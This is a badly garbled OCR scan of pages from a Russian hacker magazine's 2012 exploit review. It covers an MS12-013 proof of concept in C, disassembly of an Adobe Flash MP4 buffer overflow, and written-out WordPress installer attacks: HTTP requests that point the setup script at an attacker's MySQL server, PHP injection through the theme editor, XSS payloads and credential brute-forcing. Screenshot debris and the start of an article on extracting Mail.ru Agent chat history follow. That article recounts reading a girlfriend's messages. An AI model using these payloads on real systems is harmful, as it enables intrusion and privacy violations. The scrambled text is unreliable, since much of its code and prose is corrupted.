ttr"" !Yt _RSSERTE CnFi oat StrU itd<• C•onFI ()& t St rSt J J : lf CnFi o&tSt r Ustd•• C•pnFlo&tStr St J I 1 lf C( • pF lo<!!tStr J• • fl oats tr l no l

178 17'>

(

"" "'

lf { ( {• pF lo at S\r ) • ( _TCitAR· >.c:all oc _c: r H {• Dnf' l oa t StrSt ) ,

101

(

183

)

.text:6FF BF935 push [ebp+pulResult] ; size_t .text:6FFBF938 mov еах, [ebp+arg_8] . text:6FFBF93B push [ ebp+arg_4] ; void * . text : 6FFBF93 E mov dword ptr [еах] , 1 .text:6FFBF944 push dword ptr [esi] ; void * . text:6FFBF946 call _memcpy .text:6FFBF94B push edi ; pulResult .text:6FF BF94C push 2 ; int . text:6FFBF94E push dword ptr [edi] ; int . text:6FFBF950 call ?SizeTMult@@YAJ I I PAI @Z ; SizeTMult( uint,uint,uint *) .text: 6FFBF955 add esp, 18h РОС для MS12-01 3:

•s l t~f (_TCНRR J ) J ••

rl!tLrn FRLS[.

~=~~~~iiИ ~:~~t~~ ~1?~::~tr l no . С • onFI ()& t Str StJ •slz~H - TCHRRI J;

18< 1ВS

186 107

#include <windows . h> #include <stdio . h>

( • pnFl oo t Str Sz J· • .

) о1и

IОЗ

"'

(

199 191

{• onF io &tStrS z J,

"'

• Sit~f (_ TC HRR J J J •• '

rltLrn FRLS[ .

103

)

19< 111'5 1_ 197 198

C•DF IOIItSt r J• C.TCHRR • I CtP.IoPol nttr J; ( •onfl oo t St rS z l •• :

199 21111 1

А это пропатченная версия. Вновь посмотрим на аргументы

)

#pragma comment(linker, " / NODEFAULTLIB:msvcrt90.lib" ) #pragma comment(linker, " / NODEFAULTLIB:msvcrt80 . lib" )

CllТJ.JRRHlHG_PQP ;

rl!turn TRU[ ;

#pragma comment(lib,

"vsб/ ms vcrt.lib " )

chec k_ fl oat_ string из CRT

ХАКЕР

04 / 159/ 2012

051

www.epidemz.net


ВЗЛОМ/ ОБЗОРЭКСПЛОИТОВ

#define BUF_SIZE

Adobe Flash Player: переполнение буфера при обработке MPI. в SequenceParameterSetNALUnit

ВхЗВВ

2

void main( void {

CVSSV2

char *pStr; float f; int i;

10.0

1111 1111 11111 11 11 1111

1 IAV: N/АС: L/Au: N/C :С/ 1 : С/А: С]

DliШ

1О февраля 2012

pStr = (char*)malloc(BUF_SIZE); memset(pStr, В , BUF_SIZE); strcpy(pStr, "1 . " );

года в составе

metasploi t-a

nоявился новый модуль,

отве чающий за уязвимость в обработке mр4-файлов, которая осу­ ществляется комnонентом

Flash1 Ou.ocx Adobe Flash

Рlауег. Ошибка

расnолагается в sequencePaгameteгSet N ALUnit . Когда nроисходит обработ ка значения num _ гef_ fгames _ in _ pic _ oгdeг_cnt_cycle, раз­

for ( i=l ; i<=BUF_SIZE- lB ; i++)

мер коnируемых данных никак не nроверяется, и nроцесс

{

strcat(pStr,

Fl ash'a

бездумно коnирует nодконтрольные nользователю данные из

"В" );

offset _ foг_гef_fгame в буфер фиксированного размера, расnолагаю ­

щийся на стеке. В результате э то nриводит к удаленному выnолне­

printf( "Before scanf() \ n" );

нию nроизвольнога кода в контексте nользователя, запустившего

sscanf(pStr, "%f" , &f);

также указ ывают на то, что она активно использовалась

nроцесс

Flash-a.

Многочисленные сообщения об этой уязвимости

ITW.

1I!ПШ

printf( "After scanf() \ n");

Дизасм уязвимого места !функция sub_1005B396], Flash10u.ocx

printf( "%f \ n" , f);

10.3.181 .34:

.text:1BBSB482 call SubReadUExpGlomb ; читаем pic_order_cnt_type .text:1BBSB487 mov [esi+4Bh ], еах .text:1BBSB48A cmp еах, еЬр ; если pic_order_cnt_type !=В (еЬр=В) .text:1BBSB48C jnz short loc_1BBSB49D

if.1ildjf1 Windows Vista, Windows

Sегvег

2008, Windows 7, Wind ows

Sегvег

2008

fi•J!Iiit•J:I Существует обновление, устраняющее данную уязвимость

't OltyDbg - ms12-013poc.exe - [CPU- main thread, module ntdll: [fJ

Ftle

Vte>

Debug

Trace

Optюn.

,",,ndo s

=

@)

Нщ

§~~ ~~!!J ~~!bl.!bl ~.YJ ~~~.:!J~~ ~~_!!] ~ 8848 F8 8940 R4 854F 4С 74 еб 334F 50 8940 R4 0FB7C9 8875 ев 0FB7C9 3809 0F87 C0R70300 8056 0э 8955 С4 8848 04 8819 3808 0F85 B4R70300 8902 894R 04 891 1 8950 0 4 0F870б

0147 78 8887 в8000еее 85се

0F84 R42CF EFF 0F871E 8985 5CFF FFFF

MOV Е СХ , OWORO PTR OS: CERX-8J MOV OWORO PTR SS : С Е8Р- 5С J , ЕС Х TEST OWORO PTR OS: CEOI+• CJ,ECX J E SHORT 770E028R XOR ECX ,OWORO PTR OS: CE0!+50J MOV OWORO PTR SS: CEBP-5C J , ЕС Х MOVZ X Е СХ , С Х MOV ESI ,OWORO PTR SS : !E8P+8J tiOVZ Х Е СХ , С Х Ct1P ЕВХ . Е СХ JR 77E1 RR8B LER ЕО Х , !ES !+8 J tiOV OWORO PTR SS : I EBP-3C J , ЕОХ MOV ECX , OWORO PTR OS : IERX+4J MOV ЕВХ , OWORO PTR OS : !ECXJ С 11Р ЕВХ , ERX JNE 77 E1RR92 MOV OWORO PTR OS: CEOXJ , ERX MOV OWORO PTR OS : CEOX+4 J.ECX MOV OWORO PTR OS : !ECXJ ,EOX MOV OWORO PTR OS:!ERX+4J , EOX MOVZ X ERX , WORO PTR OS: !ES I J ROO OWORO PTR OS : CEO I +78J, ERX 110V ERX,OWORO PTR OS: !EOI+ 088J TEST ERX, ERX J E 770C2FR0 MOVZX ЕВХ , WORO PTR OS: CES I J MOV OwORO PTR SS : !EBP-0R4J,ERX

i steгs С FР Ш

00531218

tdeciмa l

Р

77DE0204

~-1~_11Jl'LЯJ\.II.1UUlHJiJLI\1ЩjUIJIJL.HЛ.t.1L_1 1 ~;,~

J"

~

1 Z 0

OS FS 0053 З2Ь L

S 1 Т 1)

о

J l l . 77DE0204

li~Ч~ .c:.bLt 111 -2bLt uu в З2btt 00"~ З2Ь а<

1 1

G

0

О О

0028

2

O(FFFFFFFF)

0(FFFFFFFF1 ЫFFFFFFFF)

01 FFFFFFFFJ 7EF OOt FFF) HF FFF',.

L~

•Err ееееее7 Е EF P~l1 0_1 T_FOU''D EFL 00018297 (~ •.B,N , ,Г,L,LE) емрtу

G. O

ST.?

емоtу

(t.O

~Т=!:

e-,.1pty 0.0

STO

STl E'MDtY (1, о

'Т4 e-f"•~ty (1.0 те: e-tt.~ty о. о о E"f"lpty 0.0

·

•• Pt У 1 • еееееееееееееееееее ?21.) d J О 0 О

70. J t

Нен

" 1_1>1

r

Е

€!27F ~ddre s.s

1

Е 0018FB30 ЕЕ Р 8018FCI8 Е ее538708 ее53ееее

Er

( 30303030) =???

ЕВ Х :0000004б

I~LI

эе3е3еэе

ее5307Ее ееееее4б

duм

RSC I I

~C18Fb-:>4

754RбСС 1 ~ 1Ju 00\JOOOCIO .• ••

OQ18F838

00530000 , • S.

OOISFBЗC

00000000 • .••

00000000 ....

0018F85'3 00:1SFB54

63040265 ES•c 00000{t0\З ••••

8ЫЭFВ5С оы ЭF86О

бОЕ29S28 000СЮ\ЗОIЭ

00000(Н)0 00000(Ю0 ооsзвr (Н)SЗ(ЮОО

so

О О

fG

1 1 1 1 1 1

0023:00401090 '~1l-01Зpoc.0040109D

•... ....

00531218 t*S· ASCJ I 00000000 00000000

()~I~FB84

'SPU 0 0 0

О О О

POS.

01)18F870 OOISFB7S 0018FB7C 001 SF880

r

••••

•• S. 00000000 •••. СЮОООООО •.•.

001SFB74

Е•

t1

t Хт '

0018FB64 0018FB6S OOISFBЬC

NH~R.S.::

p·S.

OOISF840 0018F844 0018FB48 001SFB4C OUI8F858

~

005307ЕО

смd

. .с

"UОО•З0(1€J000001~Ш(1ООООООС100000(t1Э000"

OQ(t001JOO OC(I00000 000~0009

ms12-013: результатпереnолнения кучи

ХАКЕР

052

www.epidemz.net

04/159/2012


Обзор эксплоитов

.text:1EJEJ5849D xor е Ь х , еЬх еЬх . text:1EJEJ5849F inc .text:1EJEJ5B4AEJ cmp еах, е Ь х .text:1EJEJ5B4A2 jnz short loc_1EJEJ5 B4EF ; если pic_order_cnt_type != 1 .text:1EJEJ5B4A4 mov есх, edi .text:1EJEJ5B4Aб call SubReadBit ; читaeм 'delta_pic_order_always_zero_fiag .text:1EJEJ5B4AB mov есх, edi .text:1EJEJ5B4AD mov [ esi+48h ] , al .text:1EJEJ5B4BEJ call SubReadSEx pGlomb ; читаем offset_for_non_ref_pic .text:1EJ05B4B5 mov есх , edi .text:1005B4B7 mov [esi+ 54h ], еах SubReadS ExpGlomb .text:1005B4BA call ; читаем offset_for_non_ref_pic .text:1005B4BF mov есх, edi .text:1005B4C1 mov [esi+50h ] , еах .text:1005B4C4 call SubRead UEx pGlomb ; читаем num_ref_frames_in_pic_order_cnt_cycle .text:1EJ05B4C9 mov [esi+4Ch ] , еах .text:1005B4CC test еах, еах .text:1005B4CE jbe short l oc_10EJ5B4EF ; если num_ref_frames_in_pic_order_cnt_cycle е .text:1005B4D0 lea еах, [esi+58h ] .text:1005B4DЗ mov [ esp+10h+ptr], еах .text:1005B4D7 .text:1005B4D7 l oc_100 5B4D7: ; CODE XREF: SubParseSeqParameterSet+157(j mov . text:1005B4D7 есх , edi .text:1005B4D9 call SubReadSExpGlomb ; читаем offset_for_ref_frame .text:10EJ5B4DE mov есх , [esp+10h+ptr ] .text:1005B4E2 add [ es p+10h+pt r ] , 4 .text:1005B4E7 inc еЬ р ; еЬр - счетчик цикла .text:10EJ5B4E8 mov [ есх ], е а х ; есх указывает на буфер на стеке .text:10EJ5B4EA cmp еЬр, [ es i+4Ch ] ; сравниваем счетчик ; с num_ref_frames_in_pic_order_cnt_cycle .text:1005B4ED jb shor t loc_1005 B4D7

149 <?php 150 break ; 151 case 2: 152 $dbname = trim ($_POST [ ' dbname ' ]) ; 153 $uname = trim ($ POST [ ' uname ' ]) ; 154 $passwrd = trim ($- POST [ ' pwd ' ]) ; 155 $dbhost = trim ($-POST [ ' dbhost ' ]) ; 156 $prefix = trim ($- POST [ ' prefix ' ]) ; 157 if ( empty($prefix ) ) 158 $prefix = ' wp_'; 159 160 161 // Validate $prefix : it сап only contain letters, nu mbers and underscores 162 if ( preg_match ( ' 1[ла-z0-9_] li ', $prefix ) ) 163 wp die ( / *WP I18N BAD PREFIX*/ ' <strong>ERROR</st rong>: "Table Prefix" can- only contain numbers, letters, and underscores. ' / */WP_I18N_BAD_PREFIX*/ ) ; 164 165 11 Test the db connection . / **#@+ 166 * @ignore 167 */ 168 define ( ' DB NАМЕ ', $dbname ) ; 169 define ( ' DB- USER ', $uname ); 170 define ( ' DB- PASSWORD ', $passwrd ) ; 171 define ( ' DB- HOST ', $dbhost ) ; 172 / **#@-*/ 173 174 175 11 We'll fail here if the values are no good. 176 require wp db () ; 177 if ( ! ёmpty( $wpdb ->error ) ) { 178 $back = ' <р class="step"><a href="setup-config.p hp?step=1" onclick=" j avascript: history. go( -1); return fal se;" class="button">Try Again</a></p> '; 179 wp_die ( $wpdb ->error ->get_error_message () . $ Ьас k );

180 181

} 175,2-5

П ара м ет р ы, прин и маемы е ск рип том

61%

setu p-config.php, ни как не фильт ру ютс я

Claud i us] опубликовала очере дную пачку у язвимастей в движке Функция SubReadUExpGiomЫI читает из файла экспоненци-

WoгdPгess. Среди них - исполнение произвольнаго РНР-кода ,

альный код Голом ба и декодирует его в беззнаковое число.

множественные ХSS-уя звимост и, а также раскрытие имени поль­

SubReadSExpG iomb(] читает экспоненциальный код Голамба и деко­ дирует его в знаковое число. Функция SubReadBitll производит чтение

зователя и паролядля подключения к серверу MySQL.

одного бита. Как видишь, в вышеприведенном коде не произв одится

никаких проверокна значение пum_гef_f гames _ iп _ pic _oгdeг_ спt_

tm!Шi

1. Исполнение произвольнаго

РНР-кода и хранимая XSS в с крипте setup-config.php. Сценарий исп олняется в процессе инсталляции

cycle. Вдобавок ко всему Flash Рlауег не используеттакой защитный механизм как stack cookies, поэтому атакующий может получить контроль над регистром eip без каких-либо проблем.

WoгdPгess и позволяет устанавливать движок с использованием ло­

if.1ild3f1

злоумышленник может поднять с вой собственный сервер MySQL

кальной или удаленной базы данных MyS QL. Для этого необходимо

ра с полагать валидными реквизитами для доступа к MySQL. Однако

Adobe Flash Рlауег<= 10.3.181.36

и использовать его в процессе установки, при этом не располагая

логином/паролем к MySQL на целевой системе. После успешной ин­

F-1•J!Iiit•B' Обновиться до версии

сталляции WoгdPгess злоу мышленник может внедрить произволь­ ный РНР-код через редактор тем WoгdPгess. В допол н ение к этому,

10.3.183.5

благодаря доступу к базе данных WoгdPгess становится возможным внедрить произвольный Javascгipt-кoд в контент движка, тем самым

3

Множественные уязвимости в WordPress

реализуя уязвимость хранимой XSS. Атака проводится следующим образом. Допустим,

CVSSV2

Z5

11111 1111 111 111 11111

A.B.C.D- целевой

сервер с WoгdPгess, а W.X.Y.Z- сервер злоу мышленника с установ­ ленной MySQ L . Посылаем POST- и GET -запросы для установки WoгdPгess с исполь­

IAV: N/ АС: L/Au: N/C: Р/1: Р/А: Pl

зованием базы данных злоумышленника:

[]]Ш В конце января компания Tгustwave Spideгlabs в

РОS Т-з апро с

лице и ссле дователя Джонатана Клаудиуса (Jonathan

POST /wp - admin/setup-config.php?step=2

ХАКЕР

НТТ Р/ 1 . 1

05 3

04 /159/ 201 2

www.epidemz.net


ВЗЛОМ/ ОБЗОРЭКСПЛОИ ТОВ

Host: A.B.C.D User-Agent: Mozilla/5.0 (Maeintosh; Intel Мае 05 Х 10.6; rv:8.0.1) Geeko /20100101 Firefox/8 .0.1 Aeeept: text/html,applieation/xhtml+xml, appl i eation/xml;q=0.9 , */* ;q=0.8 Aeee pt -Language: en-us,en;q=0.5 Aeeept-Eneoding: gzip, defiate Aeeept -c·ha rset: 150-8859-1, utf -8 ; q=0. 7, *; q=0. 7 Proxy-Conneetion: keep-alive Referer: http: // A.B.C.D /w p-admin/setup-eonfig.php?step=1 Cookie: wp-settings-ti me-1=1322687480; wp-settings-1=m9%3Do Content-Type: app l ieation /x -www-form-urleneoded Content-Length: 81 dbname=wordpress&uname=jsmith&pwd=jsmith&dbho st =W .X.Y.Z &prefix=wp_&submit=5ubmit GЕТ-запрое

GET / wp-admin / install.php НТТР / 1.1 Host: A. B.C.D User-Agent: Mozilla/5.0 (Maeintosh; Intel Мае 05 Х 10.6; rv:8.0. 1 ) Geeko / 20100101 Firefox /8.0. 1 Aeeept: text/html,applieation /x html+xml, app l ieation /x ml;q=0.9, */*; q=0. 8 Aeeept - Language: en-us,en;q=0.5 Aecept-Encoding: gzip, defiate Accept-Charset: I50-8859-1,utf -8 ; q=0.7, *;q =0.7 Proxy-Connection: keep-alive Referer : http: // A.B.C . D/wp-admin /se tup-config.php?step=2 Cook i e: wp-settings -ti me-1=1322687480; wp-settings- 1=m9%3 Do If-Modified -5ince: Wed, 07 Dec 2011 16:03:33 GMT С nомощью редактора тем W oгd Pгess редактируем файл

404.php

[или люб ой другой, доступный в использ уемой теме], тем са мым реализуя возможность исполнения РНР-кода :

<?p hp phpinfo(); ?> Исполняем код с помощ ью GЕТ-запроса или прост о откры в стра­ ницу в браузе ре:

GET /wp -content / themes / default/404.php НТТР / 1.1 Host: A.B.C.D User Agent: Mozilla/5.0 (Macintosh; I ntel Мае 05 10.6; rv : 8 . 0.1) Gecko/20100101 Firefox / 8.0 . 1

10. 6; rv:8.0.1) Gecko/20100101 Firefox /8 .0.1 2.

Мн ожес твенн ые

XSS

параметры

«db nam e>>, «d bhost » или << uname >>. Это реализуется

через следующий РОSТ -зап рос: РО5Т /w p-admin / setup-config.php?step=2 НТТР / 1.1 Ho st: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Мае 05 Х 10. 6; rv:8.0.1) Gecko /20 100101 Firefox /8 . 0.1 Accept: t ext/ html,appli cation/xhtml+xm l , application/xml;q=0 . 9, */* ;q=0.8 Accept-Language : en-us,en;q=0.5 Accept-Encoding: gzip, defiate Aeeept-Charset: I50-8859-1,utf-8;q=0 . 7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-eonfig.php?step=1 Content-Type: application/x-www-form-urlencoded Content- Length: 112

dbname=%3Cscript%3 Ealert%28%27123%27%29%3C%2 Fscript%3 E& uname=root&pwd=&dbhost=loealhost&prefix=wp_&submit=5ubmit 3.

Раскрытие реквизитов для доступа к базе данных

с крипт

setup-conf ig .php.

MySQL через

В процессе ин стал ляции пользователь

задает параметры базы данных

MySQL, как уже обсуждалось

ранее. При вводе неправильных реквизитов скрипт выдает ошиб­ ку, чем и можно воспользоваться, осуществляя брутфорс имени пользователя и пароля к

MySQL, причем

не только локальной, но и

любой удаленной. Запрос выглядит следующим образом: РО5Т /wp- admin / setup-config.php?step=2 Н ТТР/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Maeintosh; Intel Мае 05 Х 10 .6; rv:8.0.1) Gecko/20100101 Firefox / 8.0.1 Aecept: text/html,applieation/xhtml+xml, applicat ion /x ml;q=0 .9,*/*; q=0 . 8 Accept-Language: en-us,en;q=0.5 Aecept-Encoding: gzip, defiate Aeeept-Charset: I50-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-al ive Referer: http://A.B.C . D/wp-a dmin/setup-config.php?step=1 Co ntent -Type: application/x-www-form-ur l encoded Content-Lengt h: 32

uname=user&pwd=pass&d bho st=L.M .N.O Х

В нем делается попытка коннекта к серверу лем useг и паролем

Та к же злоумышлен ни к можети спользоватьхран имую

в скри пте setup-coпfig.php. В процессе ин­

сталляции элаумышленник может внедрить Javascгipt-кoд через

L.M.N.O

п ользовате­

pass.

XSS для

а та к и на пользователей,- для этого не обходи м о выполнить

jf.1;1djfj

такой запрос:

WoгdPгess

UPDATE wp_comments 5ЕТ co mment _c ontent= ' <script>a l ert( ' 123')</script >' where comment_content= ' Hi, this is а comment. <br /> То delete а comment , just log in and view the post's comment s . There you will have the option t o edit or delete them . ' ;

l'j•J!Ijil•J:I

Когда пользователь зайдет по ссылке, указанной в следующем GЕТ­

ляютаккаунты,вкоторыхпоумолчаниюприсутствуютдистрибутивы

зап росе , в его браузере выnолнит ся внедренный Javascгipt-кoд:

WoгdPгess суетановочными скрип т ам и, а клиент их может даже и не

3.3.1

и более ранние .

Так как уязвимый скрипт- инсталляционный, разработчики WoгdPг ess посчитали возможность реализации этих уязвимастей крайне малой и не стали выпускатьофициальных патчей. << Ни один нормальный пользователь не будет оставлять инсталляционных скриптов у себя н а сервере или прерывать процесс уста новки », ­ с читают они. Однако н екото рые хаетингавые компании предостав­

планировал использовать. Для защиты сво их серверов от этих атак

GET /? р=1 НТТР / 1. 1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel

можно порекомендоватьлишь пользоваться с ложными парелями к

MySQL, а также использовать WAF, например , ModSecuгity, в правилах Мае

05

Х

которого учтены подобного рода атаки. :Н:

ХАКЕР

www.epidemz.net

04/159/2012


·.

MAKJ.M А АnьФа· Банк (game}land

-

ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от

www.epidemz.net

29.01.1998 NQ1326"


www.epidemz.net


localhost t '

Incorrect syntax near the keyword 'se lect'. Incorrect syntax near '%' . Unclosed quotation mark after the character string ". Sys t e nl. Data . Sq i Ci i ent.Sq i Excepti o n ln c orrect syп tax 11e ar t l1e k e ywo r d 's e l ect ' . S)'!!lte:n . Dato . SqlClient. . Sql Ex cept.icщ

lп co rrect syпta x

( Ох6 0 1Зl9 0 4 ) :

n ea r

Incor r ect. 11yntax

'О/о' .

nе .н

U11 c losed q u otation m a rk afte r t l1e c l1 a r acte r s tri n g ". the keywt>rd ' :!!ele ct' .

Inco rre ct !!lynta x nе.н ' \ '. Unclos ed qUOt". ti on :::A tk a ~te r t he Ch o!! r &ct er !!ltt ing: ' ' . a t s~·ster~.Dato .SqlClient.SqlCo:mecticm . Dn!п •. (SqlExceptlon ех::~;:-:::~~ . Bcolean b:~"_:.::::!"lr.e:::::~. ) o!!t Syste.:n.Dota.SqlClle!"lt . Sqli!"IternolCon!"lectlOn. ·ru:r~ 'r {S:,lException е :е~::.:~.• 3oolean b:eai.::::-.::ee": ~~- 1 at Sy:~teш. Dat!I.SQ:lClient. IdsPar!!ler . Тh-rc ·~хсер:1 )f\A.'1: rnJ.nq O o!! t Syste.:n. r!ata. SqlClient. id!!IPar!!ler . T~JRun (Runfleha;·ior ::-.;~eha::~::: , SqlCo:r::an:! ::::-.-:!~an:!.j_e::; , S:,l:>ataRe4:!e:: :!.atoSt~e~~~ , BuH"Ccpy5iqйeRe5ultSe o t S)':lteш. Data.SqlClient.Sql:>otaReoder . TrJ(" _ns\.l.lllcl~· а1 . () o!! t Syste.:n. Dato. SqlClient. SqlJatt.Reode:: . Jet_!!etaDt.>:ll {) at Sy5te!l".. Data . SqlClient. SqlCc=and . ~·шlshExecuteRe,,Qer (S:,lDt.taReader :1~ , Ru.пBeha•JlOI :unВе~нг.:.::: , Sttlnq ::e;'le":ct:;t ::;:J.!S:r : ;:q ) at Systeж. :lata. SqlC11ent. SqlCo:-.:r.an:! . RwlExecuteReader'!'<Ь {Co~nd3ehavio:: ::-:I.Se!">a·:lc:: , RunВehavior ::. ~: •.&":.-;::: , Soolean :e:·Jr:"lSt:ea:- , Зооlеа ot Sy.!teш . Data. SqlClient. SqlCc:r.:r.an:! . RunExecuteRea~.,.. (Co:r.::-.andВehavior =-::!Ее~.&".:.:::: , RunВehavior : ;::~:!.е'и!.V1.:::: , Вaoleen :e~-.::n::-:.rea:r , Strinq -е at S}'.!tem. Jata. SqlClient. SqlCo:r.иn:!. Run!xecuteReade~ {Co:::=.andЗehavio: c.:-:1.3eh!··:.:: , Rui"\Вehavior _u:-.Eeh.a··::::: , &oolean ::e:·;:::~S-:::ea:- , Strin; :-е ~~~ Sy.!~eш.:1ata.SqlClient.SqlCo~nd . V.xeruteRea1er [Co=.andВehev.i.or l:e: с-: , St:1ш;; - ~:ht::::l ) at Sy!!ltell!. Data. SqlClient. SqlCcrr.:r.and . ExecuteDbD<•ti!.Re -r {to~r.:r.andВehavior .с~=--~·· :. : ::) at. Sy.ste~~:.Deta.Qb)e.cts . ~b]ectContext . !xc.- Jt~StтreQuerJir,t• · .:. r'!'Ele.a.t::.~' {Stвnq с.с- ... ,;.:::!I е к: , S~rinq е:::~ ::iS:e:::e::-~ , a t Sy!!ltem.Date.Ob)ect5.0bJectConte xt . f:x~= ~ .'<J:St JteQuerJ (ТEl··-~~entl (Striпq :.::· :-н;.:l:"ех: , Ob)ect{ 1 ~arar _:е:.! )

~e:qeCption ::-~::~e:j::; :. -:::

20,19\S; З..•"""""' CO&t~I)00311A07DЛ}98.16fAAJD9!!f07~[8HF979 03iiODC0Jl10(8UFдm!106C ESF EA!»9E9HC81 J З

ЬI 1 0001!9J9~)6SOIAJ.ACCЯ J .O.SOII~EC)IO'J7jJ FJШШ7666106l.F50Н7 Jfi JNDD!f6C781l!81E.I"6 ICOE!!8EШ11 4 9~82 B I28CF[I i0710687SU17Uff!

93.eJSIFI!iiOZ3JD1CSII00;<31FIIE201!881(6(&S8((76 fi-"U99690CClOIЫISFJSC!9CDCВ.U.

www.epidemz.net


-

Home

Se1rc:h

Store

ASP.NET MVC MUSIC STORE

<I P•rн c httP"'d~ltl>

<tlld

,._ .•t:rrorЩ" tп-o" ft-lo.Error~oiJIID<I"l~.

c oold

~"t • " lrrorfloH"

ll.Nh" />

typt • " flaoh.fn_tl_LI, lloooll " />

( odd"..., . " fr.-orflltrr" t~ ·· H...... (.-rorflltr-le,!l.мlo " /> ~/ Mtpllo .... l o o>

<httpl<o•>cll••» <tdol ~"'"" " I'OST,ЫT,III!IO" p,.h• "elaoh.o•d " < 1 ~>t • " l1Nh.lr,...rtoef'•I•'..,'""Y· rtu~~·

1>

</httptio"'ll l e•P </ oy118.wb>

<lyst .... W~"'"' '

cvoli ... tl...,volloUto!M•I'"'~""fll"rotl.,.. • " folw "

<-

/>

c-..too .... ~AIII-.""I"roн~l••'"'""'ll~o-,...oto• " t...,. · > • ..U I>M~ · · trrcortoa · ty"... " l'-"·lrn>rt~le, H&~h " p•eC:0"4111_ •._..,..._...tler• 1> ~- · "ln'0/' ... 11" · ,pe• " Hqh.(rr-llOio<lulo, Н...,. • ...-o<-IHO!' •" •o~oat-dlor " 1> <..W •- · " II'Т'OO"•Btor " </-IISJ

tt~ · " fl..Ь.E.......-f\IH.....,..Ir,

(Jaoh"

,-f'{-!tl"" · · _..,......,dJo~ ·

1>

.......н,... ••

. ... ~- - · н... ~ · ~ ~~~ - · ~ш~ .•,... . •• .-ь- ·юsт,r.I'T,Itf.ID " c/~1'14!~-lt•- ·t.,lolr•t..._ . />

typc • " (tu~.(~ ...... t.c~•••'•€tC>I")",

rtuh"

:~:: :-~ >

www.epidemz.net

··n~1<>1LWЬOII IIIItlt CII . ~U.tot.i.",t • • adm" а! • hiC:klt tdF

aFWeECh Gp9291~

'•m

,.F tlgm 1h]~L

181 RJ oyel

'1'6tyтТEpKzk00yA >tu;JnZ4tplq1eдZ4A,..

Cart ~01

dmln


The contro ller for path '/ Mus icStore/ Bad ' was not found or does not implement ICont ro ll er. System. Web. HttpEx ce ptioп The c oпtroller for path '/ MusicStore/ Bad ' was

поt fouпd

or does not implernent IController.

Syзtem . \\еЬ.

at at at аt

at at at at at at at at at

Logged

HttpE:xception (0 х 80004005) : The controller : or p~th ' / Xusic Stor e / Bad' \·;аз not :ound or doe3 not irrфl e me nt IConcroller. i\eb . Y..vc . ::>e:aultCo=:~trollerFactory . GetControllerinstance ( RequeзtContext .e~.;e"::c;)te x t , Туре cc;J.tJ::::l:e:T:,.-pe ) Syзtem. Keb . ~vc. ::)e:aultControllerFact.ory . Crec teController ( RequeзtContext :e:rueз~::::::.:ext , String CC:'I~:c:le: : :a=.'.:!: ) Syзtem. i\eb.~o/c.~.rcHandler . ProcessRe .{Ues In1.t ( HttpContextBaзe h:tpC'c:'\te :-::::. 1 IController' cc:1trclle: , IControllerfactory• • .:.c:c:::J") Syзtem. КеЬ. Иvс. X"'vcHandler . <>с_DiзрlауСlаззб . <Вeg.LnProcessRequest>Ь_ 2 () Sy.!tem. i\eb . Иvc . Securit;yUtil.<>c_JiзplayClaззb'l . <P "CessinApplicationTrost>b_ ( 1 Syзtem.1\eb.Y.vc . Securit;:,•Ut;il . <GetCallinApt::.,.rust'r..·ш .k.>t _O (Action :) Syзtem.l\eb.!-!vc . SecurityUtil . ProcessinAf:.,vl... ~onтrus {Action асисn ) Syзtem. i\eb.Y.vc . SecurityUtil . ProcessinAppl... 1. n.,.r .:;· ТЧ.езult] ( Func ' 1 :и::. с) Syзt;em. i\eb . Y.-.;c . ~·.;cHandler . ВeginProcessRt:ч 1eg• ( HttpConteкtBaзe h:;:;~':c:1:e:·:t , AзyncCallback calltao:;.; , ()bJect з\:.аtе ) Syзtem. i\еЬ.М".;с .~·.;cHandler . ВeqinProcessRe(!Ues· (Ht;t;pContex:t ht:~:c:1:;e z t , AзyncCallback callbac;.:, CbJect зtа.:.е ) Syзtem. i\eb . Y.vc.XvcHandler . Syзtem. Web . IHttpAзync!iandler . ВegJ.nProcessReques'" (HttpContext ccn::.e :-:-: , AзyncCallback сЬ , ObJect e:-:::.-a:Jata ) Syзtem. i\eb. HttpApplication. CallHandlerExecut~onStep . S:,•зt.em . i\eb . HttpAppl~ca tion. IExecutionStep . Execute () Syзtem. i\eb. HttpApplication . ExecuteStep (IExecutionStep зtet: , Boolean' cc:r~le-:e::IS:i:1Ch:::onou.3l:r· ) Syзtem.

сп

4

феераля

2012

г.

at 10:06 :01

www.epidemz.net


взлом

гента ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ ПЕРЕПИСКИ И КОНТАКТАМ В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ

Ты вряд ли пользуешься

Ru

Mail.

Агентом, но это бешено

ИСТОРИЯ ВЗЛОМА Н е забывай о статье

138- « Нар уше ние

Эксперимент начал ся для меня еще в далеком

2008

году когда

друг попрос~л проверить переписку его девушки в Mail . ~u Аген­

популярный сервис, который

тайны переписки ,

с каждым днем набирает

nереrоворов,

обороты . По официальным

телеграфных или иных сообщений »

и данные о конт~ктахl примитивную структуру. За пару часов был

данным месячная аудитория

УК РФ, а также

;аписа н простои , но эффективный R ТF -конвертер, который и де-

те. Тогда фа ил истории представлял из себя простой текстовик

f

телефонных nочтовых ,

на_званием *email*histoгy . txt и имел по сравнению с mгa.dbs

фа ил, в котором в настоящее время хранится ис т ория пере п иски

о наличии в ней главы 28 -

ал всю грязную работ у по вытягиванию переписки из Агента

н Преступления

Друг был в восторге. Далее, в ходе изучения программирова-.

прошлого года составляла

в сфере

ния на компилируемых языках, я в качестве практики написал

безумную цифру в

информации » lст.

этого мессенджера в конце

21,4

миллиона человек. Это

комnьютерной

программу M ail.гu H istoгy Readeг, о п исание которой попало на

страницы][ в августе

272, 273, 2741.

тогдашнего фаила истории \см. ссылки в боковом выносе! и ис­

легко объяснить,- продукт действительно удачный . Но сегодня я хо чу рассказать

о том, как был разреверсен

файл с историей сообщений пользователя.

2009 года. Получив большое количество

положительны~ отзывов, я опубликовал с трук т уру формата ходники читалки. Однако Mai l. гu Агент продолжал развиваться

пример читалки

и править балом стал новый продвинутый файл mгa.dbs. П осле,

истории mгa . dbs ,

этого соб~тия ко мне посыпались тонны сообщений от различ ­

На ди ске ты найде шь

реализацию класса

уnрощающего

'

исследование

бинарных файлов в WiлНе х-ре дакторе, и другие материалы по статье

ных людеи с просьбами за н яться им. В компа н ии с

SO LON7 мы

